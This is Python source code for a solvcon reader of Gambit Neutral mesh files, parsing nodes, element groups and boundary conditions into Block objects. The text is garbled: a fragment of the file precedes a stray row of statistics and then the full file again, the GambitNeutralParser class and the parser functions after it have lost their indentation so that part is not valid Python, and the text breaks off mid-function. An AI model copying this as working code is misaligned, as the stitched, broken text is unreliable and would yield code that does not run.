    CLNDS_MAP[3][6] = [2,4,6] # 6 nodes.
    CLNDS_MAP[3][7] = [2,4,6] # 7 nodes.
    # tpn=4: brick.
    CLNDS_MAP[4] = {}
    CLNDS_MAP[4][8] = [2,3,5,4,6,7,9,8] # 8 nodes.
    CLNDS_MAP[4][20] = [2,4,9,7,14,16,21,19] # 20 nodes.
    CLNDS_MAP[4][27] = [2,4,10,8,20,22,28,26] # 27 nodes.
    # tpn=5: tetrahedron.
    CLNDS_MAP[5] = {}
    CLNDS_MAP[5][4] = [2,3,4,5] # 4 nodes.
    CLNDS_MAP[5][10] = [2,4,7,11] # 10 nodes.
    # tpn=6: wedge.
    CLNDS_MAP[6] = {}
    CLNDS_MAP[6][6] = [2,4,3,5,7,6] # 6 nodes.
    CLNDS_MAP[6][15] = [2,7,4,11,16,13] # 15 nodes.
    CLNDS_MAP[6][18] = [2,7,4,14,19,16] # 18 nodes.
    # tpn=7: pyramid.
    CLNDS_MAP[7] = {}
    CLNDS_MAP[7][5] = [2,3,5,4,6] # 5 nodes.
    CLNDS_MAP[7][13] = [2,4,9,7,14] # 13 nodes.
    CLNDS_MAP[7][14] = [2,4,10,8,15] # 14 nodes.
    CLNDS_MAP[7][18] = [2,4,10,8,19] # 18 nodes.
    CLNDS_MAP[7][19] = [2,4,10,8,20] # 19 nodes.
    def _convert_interior_to(self, blk):
        """
        Convert interior information, i.e., connectivities, from GambitNeutral
        to Block object.

        @param blk: to-be-written Block object.
        @type blk: solvcon.block.Block
        @return: nothing.
        """
        from numpy import array
        from ..block import elemtype
        cltpn_map = self.CLTPN_MAP
        clnds_map = self.CLNDS_MAP
        # copy nodal coordinate data.
        blk.ndcrd[:,:] = self.nodes[:,:]
        # copy node definition in cells.
        cltpn = blk.cltpn
        clnds = blk.clnds
        ncell = self.ncell
        icell = 0
        while icell < ncell:
            # translate tpn from GambitNeutral to Block.
            tpn = cltpn_map[self.elems[icell,0]]
            cltpn[icell] = tpn
            # translate clnds from GambitNeutral to Block.
            nnd = elemtype[tpn,2]
            nnd_self = self.elems[icell,1]
            clnds[icell,0] = nnd
            clnds[icell,1:nnd+1] = self.elems[icell,clnds_map[tpn][nnd_self]]
            # advance cell.
            icell += 1
        # create cell groups for the block.
        clgrp = blk.clgrp
        for grp in self.grps:
            igrp = len(blk.grpnames)
            assert grp.ngp == igrp+1
            clgrp[grp.elems] = igrp
            blk.grpnames.append(grp.elmmat)
    def _convert_bc_to(self, blk, onlynames=None, name_mapper=None):
        """
        Convert boundary condition information from GambitNeutral object into
        Block object.

        @param blk: to-be-written Block object.
        @type blk: solvcon.block.Block
        @keyword onlynames: positively list wanted names of BCs.
        @type onlynames: list
        @keyword name_mapper: map name to bc type and value dictionary; the two
            objects are organized in a tuple.
        @type name_mapper: dict
        @return: nothing.
        """
        # process all neutral bc objects.
        for neubc in self.bcs:
            # extract boundary faces from neutral bc object.
            bc = neubc.tobc(blk)
            if bc is None: # skip if got nothing.
                continue
            # skip unwanted BCs.
            if onlynames:
                if bc.name not in onlynames:
                    continue
            # recreate BC according to name mapping.
            # NOTE(review): name_mapper.get(bc.name, None) is tuple-unpacked;
            # a name missing from the mapper would raise TypeError -- verify
            # callers always cover every BC name.
            if name_mapper is not None:
                bct, vdict = name_mapper.get(bc.name, None)
                if bct is not None:
                    bc = bct(bc=bc)
                    bc.feedValue(vdict)
            # save to block object.
            bc.sern = len(blk.bclist)
            bc.blk = blk
            blk.bclist.append(bc)
class NeutralIO(FormatIO):
    """
    Proxy to gambit neutral file format.
    """
    def load(self, stream, bcrej=None):
        """
        Load block from stream with BC mapper applied.

        @keyword stream: file object or file name to be read.
        @type stream: file or str
        @keyword bcrej: names of the BC to reject.
        @type bcrej: list
        @return: the loaded block.
        @rtype: solvcon.block.Block
        """
        import gzip
        # when a path (rather than an open stream) is given, open it
        # ourselves, transparently handling gzip-compressed files.
        if isinstance(stream, (bytes, str)):
            opener = gzip.open if stream.endswith('.gz') else open
            stream = opener(stream)
        neu = GambitNeutral(stream)
        stream.close()
        # build the positive BC name list; None means "keep everything".
        if bcrej:
            onlybcnames = [bc.name for bc in neu.bcs if bc.name not in bcrej]
        else:
            onlybcnames = None
        # convert loaded neutral object into block object.
        return neu.toblock(onlybcnames=onlybcnames)
if __name__ == '__main__':
    # ad-hoc smoke test: parse the neutral file named on the command line and
    # print a one-line summary plus any element groups and BC sets found.
    import sys
    if len(sys.argv) > 1:
        fname = sys.argv[1]
        neu = GambitNeutral(open(fname).read())
        sys.stdout.write("Gambit Neutral object: %s" % neu)
        if neu.grps or neu.bcs:
            sys.stdout.write(", with:\n")
            # list element groups first, then boundary condition sets.
            for lst in neu.grps, neu.bcs:
                if len(lst) > 0:
                    for obj in lst:
                        sys.stdout.write("  %s\n" % obj)
        else:
            sys.stdout.write("\n")
    else:
        sys.stdout.write("usage: %s <file name>\n" % sys.argv[0])
| 34.556346 | 81 | 0.563592 | # -*- coding: UTF-8 -*-
#
# Copyright (c) 2008, Yung-Yu Chen <yyc@solvcon.net>
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# - Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Gambit Neutral file.
"""
from .core import FormatIO
class ElementGroup(object):
    """
    One single element group information in Gambit Neutral file.

    @ivar ngp: element group index (1-based).
    @type ngp: int
    @ivar nelgp: number elements in this group.
    @type nelgp: int
    @ivar mtyp: material type (0: undefined, 1: conjugate, 2: fluid, 3: porous,
        4: solid, 5: deformable).
    @type mtyp: int
    @ivar nflags: number of solver dependent flags.
    @type nflags: int
    @ivar solver: array of solver dependent flags of shape of (nflags).
    @type solver: numpy.ndarray
    @ivar elems: elements array of shape of (nelgp).
    @type elems: numpy.ndarray
    """
    def __init__(self, data=None):
        from numpy import empty
        self.ngp = None # retained as 1-based.
        self.nelgp = None
        self.mtyp = None
        self.nflags = None
        self.elmmat = ''
        self.solver = empty(0)
        self.elems = empty(0)
        # run parser; identity test replaces the old "data != None"
        # equality test (PEP 8: comparisons to None use "is"/"is not").
        if data is not None: self._parse(data)
    def __str__(self):
        # only meaningful after _parse(); ngp/nelgp are None on a bare object.
        return '[Group #%d(%s): %d elements]' % (
            self.ngp, self.elmmat, self.nelgp)
    def _parse(self, data):
        """
        Parse given string data for element group.  Set all instance variables.

        @param data: string data for element group.
        @type data: string
        @return: nothing
        """
        from numpy import array
        # first three records: control line, group name, solver flags; the
        # remainder is the element list.
        control, enttype, solver, data = data.split('\n', 3)
        # the control line interleaves labels and values; take every second
        # token (the values) for NGP/NELGP/MTYP/NFLAGS.
        self.ngp, self.nelgp, self.mtyp, self.nflags = [
            int(val) for val in control.split()[1::2]]
        # get name.
        self.elmmat = enttype.strip()
        # solver dependent flags; split()-based parsing replaces the
        # deprecated numpy.fromstring(..., sep=' ') text mode.
        self.solver = array(solver.split(), dtype='int32')
        # element indices, renumbered from 1-based (file) to 0-based.
        self.elems = array(data.split(), dtype='int32') - 1
class BoundaryCondition(object):
    """
    Hold boundary condition values.

    @cvar CLFCS_RMAP: map clfcs definition back from block object to neutral
        object.
    @type CLFCS_RMAP: dict
    @ivar name: name of boundary condition.
    @type name: str
    @ivar itype: type of data (0: nodal, 1: elemental).
    @type itype: int
    @ivar nentry: number of entry (nodes or elements/cells).
    @type nentry: int
    @ivar nvalues: number of values for each data record.
    @type nvalues: int
    @ivar ibcode: 1D array of boundary condition code.
    @type ibcode: numpy.ndarray
    @ivar values: array of values attached to each record.
    @type values: numpy.ndarray
    """
    def __init__(self, data=None):
        from numpy import empty
        self.name = ''
        self.itype = None
        self.nentry = None
        self.nvalues = None
        self.ibcode = empty(0)
        self.elems = empty(0)
        self.values = empty(0)
        # run parser; identity test replaces the old "data != None"
        # equality test (PEP 8: comparisons to None use "is"/"is not").
        if data is not None: self._parse(data)
    def __str__(self):
        return '[BC "%s": %d entries with %d values]' % (
            self.name, self.nentry, self.nvalues)
    def _parse(self, data):
        """
        Parse given data string to boundary condition set.  Set all instance
        variables.

        @param data: string data for boundary condition set.
        @type data: str
        @return: nothing
        """
        from numpy import fromstring
        # parse header: first 32 characters hold the BC name; the rest are
        # integer tokens (itype, nentry, nvalues, then the ibcode array).
        header, data = data.split('\n', 1)
        self.name = header[:32].strip()
        tokens = fromstring(header[32:], dtype='int32', sep=' ')
        self.itype, self.nentry, self.nvalues = tokens[:3]
        self.ibcode = tokens[3:].copy()
        # parse entries.  The same text is scanned twice: once as int32 for
        # the index column(s), once as float64 for the value columns.
        if self.itype == 0: # for nodes.
            arr = fromstring(data, dtype='int32', sep=' ').reshape(
                (self.nentry, self.nvalues+1))
            self.elems = (arr[:,0]-1).copy()
            arr = fromstring(data, dtype='float64', sep=' ').reshape(
                (self.nentry, self.nvalues+1))
            self.values = (arr[:,1:]).copy()
        elif self.itype == 1: # for elements/cells.
            arr = fromstring(data, dtype='int32', sep=' ').reshape(
                (self.nentry, self.nvalues+3))
            self.elems = arr[:,:3].copy()
            # only the element index (column 0) is renumbered to 0-based.
            self.elems[:,0] -= 1
            arr = fromstring(data, dtype='float64', sep=' ').reshape(
                (self.nentry, self.nvalues+3))
            self.values = (arr[:,3:]).copy()
        else:
            raise ValueError("itype has to be either 0/1, but get %d" %
                self.itype)
    # define map for clfcs (from block to neu).
    CLFCS_RMAP = {}
    # tpn=1: edge.
    CLFCS_RMAP[1] = [1,2]
    # tpn=2: quadrilateral.
    CLFCS_RMAP[2] = [1,2,3,4]
    # tpn=3: triangle.
    CLFCS_RMAP[3] = [1,2,3]
    # tpn=4: hexahedron.
    CLFCS_RMAP[4] = [5,2,6,4,1,3]
    # tpn=5: tetrahedron.
    CLFCS_RMAP[5] = [1,2,4,3]
    # tpn=6: prism.
    CLFCS_RMAP[6] = [4,5,3,1,2]
    # tpn=7: pyramid.
    CLFCS_RMAP[7] = [5,2,3,4,1]
    def tobc(self, blk):
        """
        Extract gambit boundary condition information from self into BC object.
        Only process element/cell type of (gambit) boundary condition, and
        return None while nodal BCs encountered.

        @param blk: Block object for reference, nothing will be altered.
        @type blk: solvcon.block.Block
        @return: generic BC object.
        @rtype: solvcon.boundcond.BC
        """
        from numpy import empty
        from ..boundcond import BC
        clfcs_rmap = self.CLFCS_RMAP
        # process only element/cell type of bc.
        if self.itype != 1:
            return None
        # extract boundary face list.
        facn = empty((self.nentry,3), dtype='int32')
        facn.fill(-1)
        ibnd = 0
        for entry in self.elems:
            icl, nouse, it = entry[:3]
            tpn = blk.cltpn[icl]
            # map the neutral file's 1-based local face index to the block's
            # clfcs column for this cell shape.
            facn[ibnd,0] = blk.clfcs[icl, clfcs_rmap[tpn][it-1]]
            ibnd += 1
        # craft BC object.
        bc = BC(fpdtype=blk.fpdtype)
        bc.name = self.name
        slct = facn[:,0].argsort() # sort face list for bc object.
        bc.facn = facn[slct]
        bc.value = self.values[slct]
        # finish.
        return bc
class GambitNeutralParser(object):
"""
Parse and store information of a Gambit Neutral file.
@ivar data: data to be parsed.
@type data: str
@ivar neu: GambitNeutral object to be saved.
@type neu: solvcon.io.gambit.neutral.GambitNeutral
"""
def __init__(self, data, neu):
"""
@param data: data to be parsed.
@type data: str
@param neu: GambitNeutral object to be saved.
@type neu: solvcon.io.gambit.neutral.GambitNeutral
"""
self.data = data
self.neu = neu
def parse(self):
data = self.data
neu = self.neu
sections = data.split('ENDOFSECTION\n')
for section in sections:
header = section.split('\n', 1)[0]
processor = None
for mark in self.processors:
if mark in header:
processor = self.processors[mark]
break
if processor:
processor(section, neu)
processors = {}
def _control_info(data, neu):
"""
Take string data for "CONTROL INFO" and parse it to GambitNeutral
object. Set:
- header
- title
- data_source
- numnp
- nelem
- ngrps
- nbsets
- ndfcd
- ndfvl
@param data: sectional data.
@type data: str
@param neu: object to be saved.
@type neu: solvcon.io.gambit.neutral.GambitNetral
@return: nothing
"""
from numpy import fromstring
data = data.rstrip()
records = data.splitlines()
neu.header = records[1].strip()
neu.title = records[2].strip()
neu.data_source = records[3].strip()
values = fromstring(records[6], dtype='int32', sep=' ')
neu.numnp, neu.nelem, neu.ngrps, \
neu.nbsets, neu.ndfcd, neu.ndfvl = values
processors['CONTROL INFO'] = _control_info
def _nodal_coordinate(data, neu):
"""
Take string data for "NODAL COORDINATES" and parse it to GambitNuetral
object. Set:
- nodes
@param data: sectional data.
@type data: str
@param neu: object to be saved.
@type neu: solvcon.io.gambit.neutral.GambitNetral
@return: nothing
"""
from numpy import fromstring, empty
# discard header.
data = data.split('\n', 1)[-1]
# parse into array and reshape to 2D array.
nodes = fromstring(data, dtype='float64', sep=' ')
nodes = nodes.reshape((neu.numnp, (neu.ndfcd+1)))
# renumber according to first value of each line.
# NOTE: unused number contains garbage.
number = nodes[:,0].astype(int) - 1
newnodes = empty((number.max()+1,neu.ndfcd))
newnodes[number] = nodes[number,1:]
# set result to neu.
neu.nodes = newnodes
processors['NODAL COORDINATE'] = _nodal_coordinate
def _elements_cells(data, neu):
    """
    Take string data for "ELEMENTS/CELLS" and parse it to GambitNeutral
    object. Set:
    - elems
    @param data: sectional data.
    @type data: str
    @param neu: object to be saved.
    @type neu: solvcon.io.gambit.neutral.GambitNetral
    @return: nothing
    """
    from numpy import fromstring, empty
    # discard header.
    data = data.split('\n', 1)[-1]
    # parse into array: a flat stream of integers, where each element
    # record is (index, shape, nnode, node_0, ..., node_{nnode-1}).
    serial = fromstring(data, dtype='int32', sep=' ')
    # parse element data -- 1st pass:
    # element index, shape, and number of nodes.
    meta = empty((neu.nelem, 3), dtype='int32')
    ielem = 0
    ival = 0
    while ielem < neu.nelem:
        meta[ielem,:] = serial[ival:ival+3]
        # skip the 3 header ints plus this element's node list.
        ival += 3+meta[ielem,2]
        ielem += 1
    # parse element data -- 2nd pass:
    # node definition (row width is set by the widest element).
    maxnnode = meta[:,2].max()
    elems = empty((neu.nelem, maxnnode+2), dtype='int32')
    ielem = 0
    ival = 0
    while ielem < neu.nelem:
        elems[ielem,2:2+meta[ielem,2]] = serial[ival+3:ival+3+meta[ielem,2]]
        ival += 3+meta[ielem,2]
        ielem += 1
    elems[:,:2] = meta[:,1:] # copy the first two columns from meta.
    elems[:,2:] -= 1 # renumber node indices in elements.
    # set result to neu.
    neu.elems = elems
processors['ELEMENTS/CELLS'] = _elements_cells
def _element_group(data, neu):
    """
    Take string data for "ELEMENTS GROUP" and parse it to GambitNeutral
    object. Set:
    - grps
    @param data: sectional data.
    @type data: str
    @param neu: object to be saved.
    @type neu: solvcon.io.gambit.neutral.GambitNetral
    @return: nothing
    """
    # discard header; ElementGroup's constructor parses the body.
    # (removed unused `from numpy import fromstring, empty`)
    data = data.split('\n', 1)[-1]
    # build group.
    neu.grps.append(ElementGroup(data))
processors['ELEMENT GROUP'] = _element_group
def _boundary_conditions(data, neu):
    """
    Take string data for "BOUNDARY CONDITIONS" and parse it to
    GambitNeutral object. Set:
    - bcs
    @param data: sectional data.
    @type data: str
    @param neu: object to be saved.
    @type neu: solvcon.io.gambit.neutral.GambitNetral
    @return: nothing
    """
    # discard header; BoundaryCondition's constructor parses the body.
    # (removed unused `from numpy import fromstring, empty`)
    data = data.split('\n', 1)[-1]
    # build group.
    neu.bcs.append(BoundaryCondition(data))
processors['BOUNDARY CONDITIONS'] = _boundary_conditions
class GambitNeutralReader(object):
    """
    Read and store information of a Gambit Neutral file line by line.
    @ivar neuf: source file.
    @itype neuf: file
    @ivar neu: GambitNeutral object to be saved to.
    @itype neu: solvcon.io.gambit.neutral.GambitNeutral
    """
    def __init__(self, neuf, neu):
        self.neuf = neuf
        self.neu = neu
    def read(self):
        """Consume section headers one by one and dispatch each section
        to the matching ``_<header>`` method; stop at the first header
        with no matching handler."""
        neuf = self.neuf
        neu = self.neu
        while True:
            # Normalize e.g. "ELEMENTS/CELLS" -> "elements_cells".
            toks = neuf.readline()[:20].strip().lower().split()
            header = []
            for tok in toks:
                header.extend(tok.split('/'))
            header = '_'.join(header)
            method = getattr(self, '_'+header, None)
            if method is not None:  # was `!= None`; identity test is idiomatic
                method(neuf, neu)
                assert neuf.readline().strip() == 'ENDOFSECTION'
            else:
                break
    @staticmethod
    def _control_info(neuf, neu):
        """Parse the fixed-width CONTROL INFO section into the counters
        and identification strings of *neu*."""
        neu.header = neuf.readline().strip()
        neu.title = neuf.readline().strip()
        neu.data_source = neuf.readline().strip()
        for i in range(2): neuf.readline()  # skip two label/blank lines
        line = neuf.readline().rstrip()
        # Six right-justified 10-character integer fields.
        neu.numnp = int(line[1:10])
        neu.nelem = int(line[11:20])
        neu.ngrps = int(line[21:30])
        neu.nbsets = int(line[31:40])
        neu.ndfcd = int(line[41:50])
        neu.ndfvl = int(line[51:60])
    @staticmethod
    def _nodal_coordinates(neuf, neu):
        """Parse NODAL COORDINATES: a 10-char node id followed by
        ``ndfcd`` 20-char float fields per line."""
        from numpy import empty
        nodes = empty((neu.numnp, neu.ndfcd), dtype='float64')
        nodeids = empty(neu.numnp, dtype='int32')
        ndim = neu.ndfcd
        nnode = neu.numnp
        ind = 0
        while ind < nnode:
            line = neuf.readline()
            nodeids[ind] = int(line[:10])
            for idm in range(ndim):
                nodes[ind,idm] = float(line[10+20*idm:10+20*(idm+1)])
            ind += 1
        # renumber according to first value of each line.
        # NOTE: unused number contains garbage.
        nodeids -= 1
        neu.nodes = empty((nodeids.max()+1, neu.ndfcd), dtype='float64')
        # NOTE(review): rows are indexed by node id rather than read order —
        # correct only when ids coincide with line order; confirm.
        neu.nodes[nodeids] = nodes[nodeids]
    @staticmethod
    def _elements_cells(neuf, neu):
        """Parse ELEMENTS/CELLS: per element, shape type, node count, and
        up to 7 node ids per line (8th node continues on the next line)."""
        from numpy import empty
        from .. import block
        ncell = neu.nelem
        elems = empty((ncell, block.UnstructuredBlock.CLMND+2), dtype='int32')
        icl = 0
        while icl < ncell:
            line = neuf.readline()
            elems[icl,0] = int(line[9:11])        # element shape type
            elems[icl,1] = ncl = int(line[12:14]) # number of nodes
            for it in range(min(ncl, 7)):
                # node ids are 1-based in the file; store 0-based.
                elems[icl,2+it] = int(line[15+8*it:15+8*(it+1)]) - 1
            if ncl > 7:
                line = neuf.readline()
                elems[icl,2+7] = int(line[15:15+8]) - 1
            icl += 1
        neu.elems = elems
    @classmethod
    def _element_group(cls, neuf, neu):
        """Parse one ELEMENT GROUP section into an ElementGroup object
        and append it to ``neu.grps``."""
        emg = ElementGroup()
        # group statistics.
        line = neuf.readline()
        emg.ngp = int(line[7:7+10])
        emg.nelgp = int(line[28:28+10])
        emg.mtyp = int(line[49:49+10])
        emg.nflags = int(line[68:68+10])
        # group name.
        line = neuf.readline()
        emg.elmmat = line.strip()
        # solver data.
        emg.solver = cls._read_values(neuf, 8, emg.nflags, 'int32')
        # element data (1-based in the file; store 0-based).
        emg.elems = cls._read_values(neuf, 8, emg.nelgp, 'int32')-1
        # append group.
        neu.grps.append(emg)
    @staticmethod
    def _boundary_conditions(neuf, neu):
        """Parse one BOUNDARY CONDITIONS section (node-based itype 0 or
        element/face-based itype 1) into a BoundaryCondition object."""
        from numpy import empty
        bc = BoundaryCondition()
        # control record.
        line = neuf.readline()
        bc.name = line[:32].strip()
        bc.itype = int(line[32:32+10])
        bc.nentry = nbfc = int(line[42:42+10])
        bc.nvalues = nval = int(line[52:52+10])
        if bc.itype == 0: # nodes.
            bc.elems = elems = empty(nbfc, dtype='int32')
            bc.values = values = empty((nbfc, nval), dtype='float64')
            ibfc = 0
            while ibfc < nbfc:
                line = neuf.readline()
                elems[ibfc] = int(line[0:10])
                values[ibfc] = [float(line[10+20*it:10+20*(it+1)]) for it in
                    range(nval)]
                ibfc += 1
        elif bc.itype == 1: # elements/cells.
            bc.elems = elems = empty((nbfc, 3), dtype='int32')
            bc.values = values = empty((nbfc, nval), dtype='float64')
            ibfc = 0
            while ibfc < nbfc:
                line = neuf.readline()
                # (0-based element id, element type, face number)
                elems[ibfc] = (int(line[0:10])-1,
                    int(line[10:15]), int(line[15:20]))
                values[ibfc] = [float(line[20+20*it:20+20*(it+1)]) for it in
                    range(nval)]
                ibfc += 1
        else:
            raise ValueError('only 0/1 of itype is allowed')
        assert ibfc == nbfc
        # append.
        neu.bcs.append(bc)
    @staticmethod
    def _read_values(neuf, width, nval, dtype):
        """
        Read homogeneous values from the current position of the opened
        neutral file.
        @param neuf: neutral file.
        @type neuf: file
        @param width: character width per value.
        @type width: int
        @param nval: number of values to read.
        @type nval: int
        @param dtype: dtype string to construct ndarray.
        @type dtype: str
        @return: read array.
        @rtype: numpy.ndarray
        """
        from numpy import empty
        # determine type.
        if dtype.startswith('int'):
            vtype = int
        elif dtype.startswith('float'):
            vtype = float
        else:
            raise TypeError('%s not supported'%dtype)
        # allocate array.
        arr = empty(nval, dtype=dtype)
        # read.
        iline = 0
        ival = 0
        while ival < nval:
            line = neuf.readline()
            iline += 1
            line = line.rstrip()
            nc = len(line)
            if nc%width != 0:
                # BUGFIX: report the offending line number (was `ival/iline`,
                # a meaningless division).
                raise IndexError('not exact chars at line %d'%iline)
            nt = nc//width
            # BUGFIX: honor the requested field width (was hard-coded 8,
            # silently ignoring the `width` argument).
            arr[ival:ival+nt] = [vtype(line[width*it:width*(it+1)])
                                 for it in range(nt)]
            ival += nt
        assert ival == nval
        return arr
class GambitNeutral(object):
    """
    Represent information in a Gambit Neutral file.
    @cvar CLTPN_MAP: map cltpn from self to block.
    @type CLTPN_MAP: numpy.ndarray
    @cvar CLNDS_MAP: map clnds definition from self to block.
    @type CLNDS_MAP: dict
    @cvar CLFCS_RMAP: map clfcs definition back from block to self.
    @type CLFCS_RMAP: dict
    @ivar header: file header string.
    @type header: str
    @ivar title: title for this file.
    @type title: str
    @ivar data_source: identify the generation of the file from which program
        and version.
    @type data_source: str
    @ivar numnp: number of nodes.
    @type numnp: int
    @ivar nelem: number of elements.
    @type nelem: int
    @ivar ngrps: number of element groups.
    @type ngrps: int
    @ivar nbsets: number of boundary condition sets.
    @type nbsets: int
    @ivar ndfcd: number of coordinate directions (2/3).
    @type ndfcd: int
    @ivar ndfvl: number of velocity components (2/3).
    @type ndfvl: int
    @ivar nodes: nodes array of shape of (numnp, ndfcd).
    @type nodes: numpy.ndarray
    @ivar elems: elements array of shape of (nelem, :).
    @type elems: numpy.ndarray
    @ivar grps: list of ElementGroup objects.
    @type grps: list
    @ivar bcs: list of BoundaryCondition objects.
    @type bcs: list
    """
    def __init__(self, data):
        """
        @param data: either an open file-like object (consumed line by
            line by GambitNeutralReader) or the entire file content as a
            string (dispatched to GambitNeutralParser).
        """
        from numpy import empty
        # control info.
        self.header = ''
        self.title = ''
        self.data_source = ''
        self.numnp = None
        self.nelem = None
        self.ngrps = None
        self.nbsets = None
        self.ndfcd = None
        self.ndfvl = None
        # node info.
        self.nodes = empty(0)
        # element/cell info.
        self.elems = empty(0)
        # element group info.
        self.grps = []
        # boundary conditions info.
        self.bcs = []
        # parse/read: duck-type on a read() attribute to pick the backend.
        if hasattr(data, 'read'):
            GambitNeutralReader(data, self).read()
        else:
            GambitNeutralParser(data, self).parse()
    def __str__(self):
        return '[Neutral (%s): %d nodes, %d elements, %d groups, %d bcs]' % (
            self.title, self.numnp, self.nelem, len(self.grps), len(self.bcs))
    @property
    def ndim(self):
        """Number of spatial dimensions (alias of ndfcd)."""
        return self.ndfcd
    @property
    def nnode(self):
        """Number of stored nodes (rows of the nodes array)."""
        return self.nodes.shape[0]
    @property
    def ncell(self):
        """Number of stored elements (rows of the elems array)."""
        return self.elems.shape[0]
    def toblock(self, onlybcnames=None, bcname_mapper=None, fpdtype=None,
                use_incenter=False):
        """
        Convert GambitNeutral object to Block object.
        @keyword onlybcnames: positively list wanted names of BCs.
        @type onlybcnames: list
        @keyword bcname_mapper: map name to bc type number.
        @type bcname_mapper: dict
        @keyword fpdtype: floating-point dtype.
        @type fpdtype: str
        @keyword use_incenter: use incenter when creating block.
        @type use_incenter: bool
        @return: Block object.
        @rtype: solvcon.block.Block
        """
        from ..block import Block
        # create corresponding block according to GambitNeutral object.
        blk = Block(ndim=self.ndim, nnode=self.nnode, ncell=self.ncell,
                    fpdtype=fpdtype, use_incenter=use_incenter)
        self._convert_interior_to(blk)
        blk.build_interior()
        self._convert_bc_to(blk,
            onlynames=onlybcnames, name_mapper=bcname_mapper)
        blk.build_boundary()
        blk.build_ghost()
        return blk
    from numpy import array
    # define map for cltpn (from self to block).
    CLTPN_MAP = array([0, 1, 2, 3, 4, 6, 5, 7], dtype='int32')
    # define map for clnds (from self to block): CLNDS_MAP[tpn][nnode] is
    # the list of column indices (into the elems row) of the corner nodes.
    CLNDS_MAP = {}
    # tpn=1: edge.
    CLNDS_MAP[1] = {}
    CLNDS_MAP[1][2] = [2,3] # 2 nodes.
    CLNDS_MAP[1][3] = [2,4] # 3 nodes.
    # tpn=2: quadrilateral.
    CLNDS_MAP[2] = {}
    CLNDS_MAP[2][4] = [2,3,4,5] # 4 nodes.
    CLNDS_MAP[2][8] = [2,4,6,8] # 8 nodes.
    CLNDS_MAP[2][9] = [2,4,6,8] # 9 nodes.
    # tpn=3: triangle.
    CLNDS_MAP[3] = {}
    CLNDS_MAP[3][3] = [2,3,4] # 3 nodes.
    CLNDS_MAP[3][6] = [2,4,6] # 6 nodes.
    CLNDS_MAP[3][7] = [2,4,6] # 7 nodes.
    # tpn=4: brick.
    CLNDS_MAP[4] = {}
    CLNDS_MAP[4][8] = [2,3,5,4,6,7,9,8] # 8 nodes.
    CLNDS_MAP[4][20] = [2,4,9,7,14,16,21,19] # 20 nodes.
    CLNDS_MAP[4][27] = [2,4,10,8,20,22,28,26] # 27 nodes.
    # tpn=5: tetrahedron.
    CLNDS_MAP[5] = {}
    CLNDS_MAP[5][4] = [2,3,4,5] # 4 nodes.
    CLNDS_MAP[5][10] = [2,4,7,11] # 10 nodes.
    # tpn=6: wedge.
    CLNDS_MAP[6] = {}
    CLNDS_MAP[6][6] = [2,4,3,5,7,6] # 6 nodes.
    CLNDS_MAP[6][15] = [2,7,4,11,16,13] # 15 nodes.
    CLNDS_MAP[6][18] = [2,7,4,14,19,16] # 18 nodes.
    # tpn=7: pyramid.
    CLNDS_MAP[7] = {}
    CLNDS_MAP[7][5] = [2,3,5,4,6] # 5 nodes.
    CLNDS_MAP[7][13] = [2,4,9,7,14] # 13 nodes.
    CLNDS_MAP[7][14] = [2,4,10,8,15] # 14 nodes.
    CLNDS_MAP[7][18] = [2,4,10,8,19] # 18 nodes.
    CLNDS_MAP[7][19] = [2,4,10,8,20] # 19 nodes.
    def _convert_interior_to(self, blk):
        """
        Convert interior information, i.e., connectivities, from GambitNeutral
        to Block object.
        @param blk: to-be-written Block object.
        @type blk: solvcon.block.Block
        @return: nothing.
        """
        from numpy import array
        from ..block import elemtype
        cltpn_map = self.CLTPN_MAP
        clnds_map = self.CLNDS_MAP
        # copy nodal coordinate data.
        blk.ndcrd[:,:] = self.nodes[:,:]
        # copy node difinition in cells.
        cltpn = blk.cltpn
        clnds = blk.clnds
        ncell = self.ncell
        icell = 0
        while icell < ncell:
            # translate tpn from GambitNeutral to Block.
            tpn = cltpn_map[self.elems[icell,0]]
            cltpn[icell] = tpn
            # translate clnds from GambitNeutral to Block: pick the corner
            # node columns for this shape/node-count combination.
            nnd = elemtype[tpn,2]
            nnd_self = self.elems[icell,1]
            clnds[icell,0] = nnd
            clnds[icell,1:nnd+1] = self.elems[icell,clnds_map[tpn][nnd_self]]
            # advance cell.
            icell += 1
        # create cell groups for the block.
        clgrp = blk.clgrp
        for grp in self.grps:
            igrp = len(blk.grpnames)
            # groups are expected to arrive in order (ngp is 1-based).
            assert grp.ngp == igrp+1
            clgrp[grp.elems] = igrp
            blk.grpnames.append(grp.elmmat)
    def _convert_bc_to(self, blk, onlynames=None, name_mapper=None):
        """
        Convert boundary condition information from GambitNeutral object into
        Block object.
        @param blk: to-be-written Block object.
        @type blk: solvcon.block.Block
        @keyword onlynames: positively list wanted names of BCs.
        @type onlynames: list
        @keyword name_mapper: map name to bc type and value dictionary; the two
            objects are organized in a tuple.
        @type name_mapper: dict
        @return: nothing.
        """
        # process all neutral bc objects.
        for neubc in self.bcs:
            # extract boundary faces from neutral bc object.
            bc = neubc.tobc(blk)
            if bc is None: # skip if got nothing.
                continue
            # skip unwanted BCs.
            if onlynames:
                if bc.name not in onlynames:
                    continue
            # recreate BC according to name mapping.
            if name_mapper is not None:
